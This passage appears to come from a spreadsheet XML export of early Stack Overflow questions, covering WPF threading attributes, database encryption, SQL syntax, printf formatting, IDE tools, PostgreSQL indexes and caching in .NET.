&lt;p&gt;When I wanted to use it yesterday, I was puzzled to find out that Intellisense didn't show the function (nor &lt;code&gt;VerifyAccess()&lt;/code&gt;, which throws an exception when not on the UI thread), even though the MSDN library lists it. I decided to investigate the class using Reflector. It seems that the function in question has an &lt;code&gt;EditorBrowsable(EditorBrowsableState.Never)&lt;/code&gt; attribute attached to it. The &lt;code&gt;Dispatcher&lt;/code&gt; class, which is used by &lt;code&gt;DispatcherObject&lt;/code&gt;, has the same attribute attached to &lt;code&gt;CheckAccess()&lt;/code&gt; and &lt;code&gt;VerifyAccess()&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public abstract class DispatcherObject
{
    // ...
    [EditorBrowsable(EditorBrowsableState.Never)]
    public bool CheckAccess();
    [EditorBrowsable(EditorBrowsableState.Never)]
    public void VerifyAccess();
    // ...
    [EditorBrowsable(EditorBrowsableState.Advanced)]
    public Dispatcher Dispatcher { get; }
}
public sealed class Dispatcher
{
    // ...
    [EditorBrowsable(EditorBrowsableState.Never)]
    public bool CheckAccess();
    [EditorBrowsable(EditorBrowsableState.Never)]
    public void VerifyAccess();
    // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't believe that the application of that attribute is random (or a joke), so my question is: why is it there? Should those methods not be called directly? Then why aren't they &lt;code&gt;protected&lt;/code&gt; (or &lt;code&gt;internal&lt;/code&gt;, like some of the most useful methods in the WPF)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Suitable alternative to CryptEncrypt</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a situation in our product where for a long time some data has been stored in the application's database as SQL string (choice of MS SQL server or sybase SQL anywhere) which was encrypted via the Windows API function &lt;a href="http://msdn.microsoft.com/en-us/library/aa379924.aspx" rel="nofollow"&gt;CryptEncrypt.&lt;/a&gt;  (direct and decryptable)&lt;/p&gt;
&lt;p&gt;The problem is that CryptEncrypt can produce NULL's in the output, meaning that when it's stored in the database, the string manipulations will at some point truncate the ciphertext.&lt;/p&gt;
&lt;p&gt;Ideally we'd like to use an algo that will produce cyphertext that doesn't contain NULLs as that will cause the least amount of change to the existing databases (changing a column from string to binary and code to deal with binary instead of strings) and just decrypt existing data and re-encrypt with the new algo at database upgrade time.&lt;/p&gt;
&lt;p&gt;The algorithm doesn't need to be the most secure, as the database is already in a reasonably secure environment (not an open network / teh interwebs) but does need to bebetter than ROT13 (which I can almost decrypt in my head now!)&lt;/p&gt;
&lt;p&gt;Cheers&lt;/p&gt;
&lt;p&gt;edit: btw, any particular reason for changing ciphertext to cyphertext? ciphertext seems more widely used...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tracking Useful Information</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What do the clever programmers here do to keep track of handy programming tricks and useful information they pick up over their many years of experience? Things like useful compiler arguments, IDE short-cuts, clever code snippets, etc.&lt;/p&gt;
&lt;p&gt;I sometimes find myself frustrated when looking up something that I used to know a year or two ago. My IE favourites probably represent a good chunk of the Internet in the late 1990s, so clearly that isn't effective (at least for me). Or am I just getting old?&lt;/p&gt;
&lt;p&gt;So.. what do you do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I learn about parser combinators?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've found a few resources on the subject, but they all require a deep understanding of &lt;a href="http://en.wikipedia.org/wiki/Smalltalk"&gt;SmallTalk&lt;/a&gt; or &lt;a href="http://en.wikipedia.org/wiki/Haskell_%28programming_language%29"&gt;Haskell&lt;/a&gt;, neither of which I know.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Select ..... where .... OR </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to select data where any one of multiple conditions occur on the same field?&lt;/p&gt;
&lt;p&gt;Example: I would typically write a statement such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select * from TABLE where field = 1 or field = 2 or field = 3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to instead say something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select * from TABLE where field = 1 || 2 || 3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any help is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mac iWork/Pages Automation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is a rich scripting model for Microsoft Office, but not so with Apple iWork, and specifically the word processor Pages. While there are some AppleScript hooks, it looks like the best approach is to manipulate the underlying XML data.&lt;/p&gt;
&lt;p&gt;This turns out to be pretty ugly because (for example) page breaks are stored in XML. So for example, you have something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;... we hold these truths to be self evident, that &amp;lt;/page&amp;gt;
&amp;lt;page&amp;gt;all men are created equal, and are ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So if you want to add or remove text, you have to move the start/end tags around based on the size of the text on the page. This is pretty impossible without computing the number of words a page can hold, which seems wildly inelegant.&lt;/p&gt;
&lt;p&gt;Anybody have any thoughts on this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PowerShell App.Config</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone worked out how to get PowerShell to use &lt;code&gt;app.config&lt;/code&gt; files? I have a couple of .NET DLL's I'd like to use in one of my scripts but they expect their own config sections to be present in &lt;code&gt;app.config&lt;/code&gt;/&lt;code&gt;web.config&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What Comes After The %?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've searched for this a little but I have not gotten a particularly straight answer. In C (and I guess C++), how do you determine what comes after the % when using &lt;code&gt;printf&lt;/code&gt;?. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;double radius = 1.0;
double area = 0.0;
area = calculateArea( radius );
printf( "%10.1f     %10.2\n", radius, area );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I took this example straight from a book that I have on the C language. This does not make sense to me at all. Where do you come up with &lt;code&gt;10.1f&lt;/code&gt; and &lt;code&gt;10.2f&lt;/code&gt;? Could someone please explain this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is AnkhSVN any good?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I asked a couple of coworkers about &lt;a href="http://ankhsvn.open.collab.net" rel="nofollow"&gt;AnkhSVN&lt;/a&gt; and neither one of them was happy with it. One of them went as far as saying that AnkhSVN has messed up his devenv several times.&lt;/p&gt;
&lt;p&gt;What's your experience with AnkhSVN? I really miss having an IDE integrated source control tool.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best traffic / performance / usage monitoring module?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any open source (or I guess commercial) packages that you can plug into your site for monitoring purposes? I'd like something that we can hook up to our ASP.NET site and use to provide reporting on things like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;performance over time&lt;/li&gt;
&lt;li&gt;current load&lt;/li&gt;
&lt;li&gt;page traffic&lt;/li&gt;
&lt;li&gt;SQL performance&lt;/li&gt;
&lt;li&gt;PU time monitoring &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ideally in c# :)&lt;/p&gt;
&lt;p&gt;With some sexy graphs.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: I'd also be happy with a package that I can feed statistics and views of data to, and it would analyse trends, spot abnormal behaviour (e.g. "no one has logged in for the last hour. is this Ok?", "high traffic levels detected", "low number of API calls detected")  and generally be very useful indeed. Does such a thing exist?&lt;/p&gt;
&lt;p&gt;At my last office we had a big screen which showed us loads and loads of performance counters over a couple of time ranges, and we could spot weird stuff happening, but the data was not stored and there was no way to report on it. Its a package for doing this that I'm after.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creation Date of Compiled Executable (VC++ 2005)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The creation date of an executable linked in VS2005 is not set to the real creation-date of the exe-file. Only a complete re-build will set the current date, a re-link will not do it. Obviously the file is set to some date, which is taken from one of the project-files. &lt;/p&gt;
&lt;p&gt;So: is there a way to force the linker to set the creation-date to the real link-date?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Do You Secure database.yml?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Within Ruby on Rails applications database.yml is a plain text file that stores database credentials.&lt;/p&gt;
&lt;p&gt;When I deploy my Rails applications I have an after deploy callback in my Capistrano 
recipe that creates a symbolic link within the application's /config directory to the database.yml file. The file itself is stored in a separate directory that's outside the standard Capistrano /releases directory structure. I chmod 400 the file so it's only readable by the user who created it.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is this sufficient to lock it down? If not, what else do you do?&lt;/li&gt;
&lt;li&gt;Is anyone encrypting their database.yml files?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Is Mono ready for prime time?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone used Mono, the open source .NET implementation on a large or medium sized project? I'm wondering if it's ready for real world, production environments. Is it stable, fast, compatible, ... enough to use? Does it take a lot of effort to port projects to the Mono runtime, or is it really, &lt;em&gt;really&lt;/em&gt; compatible enough to just take of and run already written code for Microsoft's runtime?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practise to authorize all users for just one page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to authorize all users to one single page in a asp.net website.&lt;/p&gt;
&lt;p&gt;For except the login page and one other page, I deny all users from viewing pages in the website. &lt;/p&gt;
&lt;p&gt;How do you make this page accessible to all users?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Arguments for going open source</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've spent my downtime at work this summer writing a framework of sorts for facilitating my day to day work. In short it loads a xml with markup that defines the blocks of the site, their content and the styling of these (very similar to html), handles the loading of assets and such.&lt;/p&gt;
&lt;p&gt;Now I'm rather pleased with how this is turning out, and I've been itching to release some of my code for public use (and scrutiny). I'm also reasonably sure that it fills a void for quick and easy construction of sites (or parts of them).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;What would be the best arguments to convince my boss/coworkers that releasing this under an open source license is a good idea?&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you set, or where is, the local document root?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When opening a file from your hard drive into your browser, where is the document root?  To illustrate, given the following HTML code, if the page is opened from the local machine(file:///) then where should the css file be for the browser to find it?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;link href="/temp/test.css" rel="stylesheet" type="text/css" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to check set of files conform to a naming scheme</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a bunch of files (TV episodes, although that is fairly arbitrary) that I want to check match a specific naming/organisation scheme..&lt;/p&gt;
&lt;p&gt;Currently: I have three arrays of regex, one for valid filenames, one for files missing an episode name, and one for valid paths.&lt;/p&gt;
&lt;p&gt;Then, I loop though each valid-filename regex, if it matches, append it to a "valid" dict, if not, do the same with the missing-ep-name regexs, if it matches this I append it to an "invalid" dict with an error code (2:'missing epsiode name'), if it matches neither, it gets added to invalid with the 'malformed name' error code.&lt;/p&gt;
&lt;p&gt;The current code can be found &lt;a href="http://github.com/dbr/checktveps/tree/8a6dc68ad61e684c8d8f0ca1dc37a22d1c51aa82/2checkTvEps.py" rel="nofollow"&gt;here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I want to add a rule that checks for the presence of a folder.jpg file in each directory, but to add this would make the code substantially more messy in it's current state.. &lt;/p&gt;
&lt;p&gt;How could I write this system in a more expandable way?&lt;/p&gt;
&lt;p&gt;The rules it needs to check would be..&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;File is in the format &lt;code&gt;Show Name - [01x23] - Episode Name.avi&lt;/code&gt; or &lt;code&gt;Show Name - [01xSpecial02] - Special Name.avi&lt;/code&gt; or &lt;code&gt;Show Name - [01xExtra01] - Extra Name.avi&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;If filename is in the format &lt;code&gt;Show Name - [01x23].avi&lt;/code&gt; display it a 'missing episode name' section of the output&lt;/li&gt;
&lt;li&gt;The path should be in the format &lt;code&gt;Show Name/season 2/the_file.avi&lt;/code&gt; (where season 2 should be the correct season number in the filename)&lt;/li&gt;
&lt;li&gt;each &lt;code&gt;Show Name/season 1/&lt;/code&gt; folder should contain "folder.jpg"&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;.any ideas? While I'm trying to check TV episodes, this concept/code should be able to apply to many things..&lt;/p&gt;
&lt;p&gt;The only thought I had was a list of dicts in the format:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;checker = [
{
    'name':'valid files',
    'type':'file',
    'function':check_valid(), # runs check_valid() on all files
    'status':0 # if it returns True, this is the status the file gets
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Code to ask yes/no question in javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I could only find the function &lt;code&gt;confirm()&lt;/code&gt; that gives OK/Cancel buttons. Is there any way to give Yes/No buttons?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Display rows in multiple columns in Asp.net Gridview</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;By default each row of a Gridview maps to each row in a datatable or dataset attached to its datasource. But what if I want to display these rows in multiple columns. For example if it has 10 rows, 5 rows each should be displayed in 2 columns side by side. Also can I do this with the Infragistics grid. Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to keep an ordered list of windows (from most-recently created to oldest)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to manage a list of windows (keeping them in order) to be able to promote the next window to the top-level when the current top-level window is closed.&lt;br&gt;
This is for a web application, so we're using jQuery Javascript.&lt;/p&gt;
&lt;p&gt;We'd talked through a few simplistic solutions, such as using an array and just treating [0] index as the top-most window.&lt;/p&gt;
&lt;p&gt;I'm wondering if there's any potentially more efficient or useful alternative to what we had brainstormed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the most important things to learn about .net as a Project Manager?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Thinking about getting into .net technology project management&lt;/p&gt;
&lt;p&gt;I've had plenty of experience with PHP projects: I'm aware of most of the existing frameworks and libraries, and I've written specs and case studies based on this knowledge.&lt;/p&gt;
&lt;p&gt;What should I know about .net?
Which top resources would you recommend me to know so I can rapidly learn and later stay up to date on the technology?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit (8.24.08):&lt;/strong&gt; The answers I got so far essentially discuss being a good PM. Thanks, but this is not what I meant. Any .net essentials would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any ReSharper equivalent for Xcode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a complete Xcode/Objective-C/Cocoa newbie but I'm learning fast and really starting to enjoy getting to grips with a new language, platform and paradigm.&lt;/p&gt;
&lt;p&gt;One thing is though, having been using Visual Studio with R# for so long I've kind of been spoiled with the coding tools such as refactorings and completion etc and as far as I can tell Xcode has some fairly limited built in support for this stuff.&lt;/p&gt;
&lt;p&gt;On that note, does anyone know if any add-ins or whatever are available for the Xcode environment which add coding helpers such as automatically generating implementation skeletons from a class interface definition etc? &lt;/p&gt;
&lt;p&gt;I suspect there aren't but I suppose it can't help to ask.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cleaning up RTF text</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to take some RTF input and clean it to remove all RTF formatting except \ul \b \i to paste it into Word with minor format information.&lt;/p&gt;
&lt;p&gt;The command used to paste into Word will be something like:
oWord.ActiveDocument.ActiveWindow.Selection.PasteAndFormat(0) (with some RTF text already in the Clipboard)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{\rtf1\ansi\deff0{\fonttbl{\f0\fnil\fcharset0 Courier New;}}
{\colortbl ;\red255\green255\blue140;}
\viewkind4\uc1\pard\highlight1\lang3084\f0\fs18 The company is a global leader in responsible tourism and was \ul the first major hotel chain in North America\ulnone  to embrace environmental stewardship within its daily operations\highlight0\par
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Do you have any idea on how I can clean up the RTF safely with some regular expressions or something? I am using VB.NET to do the processing but any .NET language sample will do.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Executing JavaScript from Flex: Is this javascript function dangerous?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a flex application that needs the ability to generate and execute JavaScript. When I say this, I mean I need to execute raw JavaScript that I create in my Flex application (not just an existing JavaScript method)&lt;/p&gt;
&lt;p&gt;I am currently doing this by exposing the following JavaScript method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function doScript(js){ eval(js);}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can then do something like this in Flex (note: I am doing something more substantial then an alert box in the real Flex app):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ExternalInterface.call("doScript","alert('foo'));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question is does this impose any security risk, I am assuming it's not since the Flex and JasvaScript all run client side...&lt;/p&gt;
&lt;p&gt;Is there a better way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server - Dirty Reads Pros &amp; Cons</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why should I or shouldn't I use dirty reads:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;set transaction isolation level read uncommitted
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in SQL Server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to stop NTFS volume auto-mounting on OS X?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a bit newbieish when it comes to the deeper parts of OSX configuration and am having to put up with a fairly irritating niggle which while I can put up with it, I know under Windows I could have sorted in minutes.&lt;/p&gt;
&lt;p&gt;Basically, I have an external disk with two volumes: &lt;/p&gt;
&lt;p&gt;One is an HFS+ volume which I use for TimeMachine backups.
The other, an NTFS volume that I use for general file copying etc on Mac and Windows boxes.&lt;/p&gt;
&lt;p&gt;So what happens is that whenever I plug in the disk into my Mac USB, OSX goes off and mounts both volumes and shows an icon on the desktop for each. The thing is that to remove the disk you have to eject the volume and in this case do it for both volumes, which causes an annoying warning dialog to be shown every time. &lt;/p&gt;
&lt;p&gt;What I'd prefer is some way to prevent the NTFS volume from auto-mounting altogether. I've done some hefty googling and here's a list of things I've tried so far:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I've tried going through options in Disk Utility&lt;/li&gt;
&lt;li&gt;I've tried setting AutoMount to No in /etc/hostconfig but that is a bit too global for my liking.&lt;/li&gt;
&lt;li&gt;I've also tried the suggested approach to putting settings in fstab but it appears the OSX (10.5) is ignoring these settings.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Any other suggestions would be welcomed. Just a little dissapointed that I can't just tick a box somewhere (or untick).&lt;/p&gt;
&lt;p&gt;EDIT: Thanks heaps to hop for the answer it worked a treat. For the record it turns out that it wasn't OSX not picking up the settings I actually had "msdos" instead of "ntfs" in the fs type column.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java JPanel redraw issues</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Java swing application with a panel that contains three JComboBoxes that do not draw properly.&lt;br&gt;
The combox boxes just show up as the down arrow on the right side, but without the label of the currently selected value.&lt;br&gt;
The boxes will redraw correctly if the window is resized either bigger or smaller by even one pixel.&lt;/p&gt;
&lt;p&gt;All of my googling has pointed to calling revalidate() on the JPanel to fix this, but that hasn't worked for me.&lt;br&gt;
Calling updateUI() on the JPanel has changed it from always displaying incorrectly to displaying incorrectly half of the time.  &lt;/p&gt;
&lt;p&gt;Has anyone else seen this and found a different way to force a redraw of the combo boxes?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight vs Flex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company develops several types of applications.  A lot of our business comes from doing multimedia-type apps, typically done in Flash.  However, now that side of the house is starting to migrate towards doing Flex development.&lt;/p&gt;
&lt;p&gt;Most of our other development is done using .NET.  I'm trying to make a push towards doing Silverlight development instead, since it would take better advantage of the .NET developers on staff.  I prefer the Silverlight platform over the Flex platform for the simple fact that Silverlight is all .NET code.  We have more .NET developers on staff than Flash/Flex developers, and most of our Flash/Flex developers are graphic artists (not real programmers).  Only reason they push towards Flex right now is because it seems like the logical step from Flash.&lt;/p&gt;
&lt;p&gt;I've done development using both, and I honestly believe Silverlight is easier to work with.  But I'm trying to convince people who are only Flash developers. &lt;/p&gt;
&lt;p&gt;So here's my question:  If I'm going to go into a meeting to praise Silverlight, why would a company want to go with Silverlight instead of Flex?  Other than the obvious "not everyone has Silverlight", what are the pros and cons for each?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any way to configure windows to not change the focus?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm tired of being in the middle of typing something, having a pop-up with a question appear, and hitting enter before reading it... (it also happens with some windows that are not pop-ups)&lt;/p&gt;
&lt;p&gt;Do you know if there's some setting I could touch for this not to happen?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Am I missing something about LINQ?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I seem to be missing something about LINQ.  To me, it looks like it's taking some of the elements of SQL that I like the least and moving them into the C# language and using them for other things.&lt;/p&gt;
&lt;p&gt;I mean, I could see the benefit of using SQL-like statements on things other than databases.  But if I wanted to write SQL, well, why not just write SQL and keep it out of C#?  What am I missing here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Hostmonster support Django</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know Hostmonster allows Python. Has anyone successfully run Django on there? Any problems? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to enable multisampling for a wxWidgets OpenGL program?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;&lt;a href="http://en.wikipedia.org/wiki/Multisample_anti-aliasing" rel="nofollow"&gt;Multisampling&lt;/a&gt;&lt;/strong&gt; is a way of applying &lt;strong&gt;full screen anti-aliasing&lt;/strong&gt; (FSAA) in 3D applications. I need to use multisampling in my OpenGL program, which is currently embedded in a &lt;strong&gt;wxWidgets&lt;/strong&gt; GUI. Is there a way to do this? Please respond only if you know the detailed steps to achieve this.&lt;/p&gt;
&lt;p&gt;I'm aware of enabling multisampling using &lt;strong&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/ms537544%28VS.85%29.aspx" rel="nofollow"&gt;WGL&lt;/a&gt;&lt;/strong&gt; (Win32 extensions to OpenGL). However, since my OpenGL program isn't written in MFC (and I want the code to be multi-platform portable), that's not an option for me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET - Get protocol, host, and port</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a simple way in &lt;em&gt;.NET&lt;/em&gt; to quickly get the current protocol, host, and port? For example, if I'm on the following URL:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;http://www.mywebsite.com:80/pages/page1.aspx&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I need to return:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;http://www.mywebsite.com:80&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I know I can use &lt;code&gt;Request.Url.AbsoluteUri&lt;/code&gt; to get the complete URL, and I know I can use &lt;code&gt;Request.Url.Authority&lt;/code&gt; to get the host and port, but I'm not sure of the best way to get the protocol without parsing out the URL string.&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PostgreSQL: GIN or GiST indexes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From what information I could find, they both solve the same problems - more esoteric operations like array containment and intersection (&amp;amp;&amp;amp;, @&gt;, &amp;lt;@, etc). However I would be interested in advice about when to use one or the other (or neither possibly).&lt;br&gt;
The &lt;a href="http://www.postgresql.org/docs/current/static/textsearch-indexes.html"&gt;PostgreSQL documentation&lt;/a&gt; has some information about this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;GIN index lookups are about three times faster than GiST&lt;/li&gt;
&lt;li&gt;GIN indexes take about three times longer to build than GiST&lt;/li&gt;
&lt;li&gt;GIN indexes are about ten times slower to update than GiST&lt;/li&gt;
&lt;li&gt;GIN indexes are two-to-three times larger than GiST&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However I would be particularly interested to know if there is a performance impact when the memory to index size ration starts getting small (ie. the index size becomes much bigger than the available memory)? I've been told on the #postgresql IRC channel that GIN needs to keep all the index in memory, otherwise it won't be effective, because, unlike B-Tree, it doesn't know which part to read in from disk for a particular query? The question would be: is this true (because I've also been told the opposite of this)? Does GiST have the same restrictions? Are there other restrictions I should be aware of while using one of these indexing algorithms?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>System.Web.Caching vs. Enterprise Library Caching Block</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For a .NET component that will be used in both web applications and rich client applications, there seem to be two obvious options for caching: System.Web.Caching or the Ent. Lib. Caching Block.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What do you use?&lt;/li&gt;
&lt;li&gt;Why?&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/system.web.caching.aspx"&gt;System.Web.Caching&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Is this safe to use outside of web apps?  I've seen mixed information, but I think the answer is maybe-kind-of-not-really.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://support.microsoft.com/kb/917411"&gt;a KB article warning against 1.0 and 1.1 non web app use&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;The 2.0 page has a &lt;em&gt;comment&lt;/em&gt; that indicates it's OK: &lt;a href="http://msdn.microsoft.com/en-us/library/system.web.caching.cache(VS.80).aspx"&gt;http://msdn.microsoft.com/en-us/library/system.web.caching.cache(VS.80).aspx&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.hanselman.com/blog/UsingTheASPNETCacheOutsideOfASPNET.aspx"&gt;Scott Hanselman is creeped out by the notion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/system.web.caching.cache.aspx"&gt;The 3.5 page&lt;/a&gt; includes a warning against such use&lt;/li&gt;
&lt;li&gt;Rob Howard &lt;a href="http://weblogs.asp.net/cschittko/archive/2004/07/04/172684.aspx"&gt;encouraged use outside of web apps&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I don't expect to use one of its highlights, &lt;a href="http://msdn.microsoft.com/en-us/library/system.web.caching.sqlcachedependency.aspx"&gt;SqlCacheDependency&lt;/a&gt;, but the addition of &lt;a href="http://msdn.microsoft.com/en-us/library/system.web.caching.cacheitemupdatecallback.aspx"&gt;CacheItemUpdateCallback&lt;/a&gt; in .NET 3.5 seems like a Really Good Thing.  &lt;/p&gt;
&lt;h2&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/aa480453.aspx"&gt;Enterprise Library Caching Application Block&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;other blocks are already in use so the dependency already exists&lt;/li&gt;
&lt;li&gt;cache persistence isn't necessary; regenerating the cache on restart is OK&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Some cache items should always be available, but be refreshed periodically.  For these items, getting a callback &lt;em&gt;after&lt;/em&gt; an item has been removed is not very convenient.  It looks like a client will have to just sleep and poll until the cache item is repopulated.&lt;/p&gt;
&lt;h2&gt;&lt;a href="http://jehiah.cz/projects/memcached-win32/"&gt;Memcached for Win32&lt;/a&gt; + &lt;a href="http://sourceforge.net/projects/memcacheddotnet/"&gt;.NET client&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;What are the pros and cons when you don't need a &lt;em&gt;distributed&lt;/em&gt; cache?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Table cells larger than they are meant to be</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created a map system for a game that runs on the principle of drawing the picture of the map from tiles. There are many reasons for this which I won't go into here but if you really want to know then I'm sure you can find out how to contact me ;)&lt;/p&gt;
&lt;p&gt;I have &lt;a href="http://woarl.com/board/rob.php?mode=map&amp;amp;x=-1&amp;amp;y=9&amp;amp;w=2&amp;amp;h=2" rel="nofollow"&gt;made the latest version live&lt;/a&gt; so you can see exactly where the problem lies and the source. The issue is the line between the top 2 tiles and the bottom 2 tiles, I can't figure out why it's gone like this and any help would be appreciated.&lt;/p&gt;
&lt;p&gt;In the source is a marker called "stackoverflow", if you search for "stackoverflow" when viewing source then it should take you to the table in question.&lt;/p&gt;
&lt;p&gt;I have also uploaded an &lt;a href="http://woarl.com/badMap.png" rel="nofollow"&gt;image of the issue&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you compile Apache HTTP Server and redeploy its binaries to a different location?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As part of our product release we ship Apache HTTP Server binaries that we have compiled on our (UNIX) development machine.&lt;/p&gt;
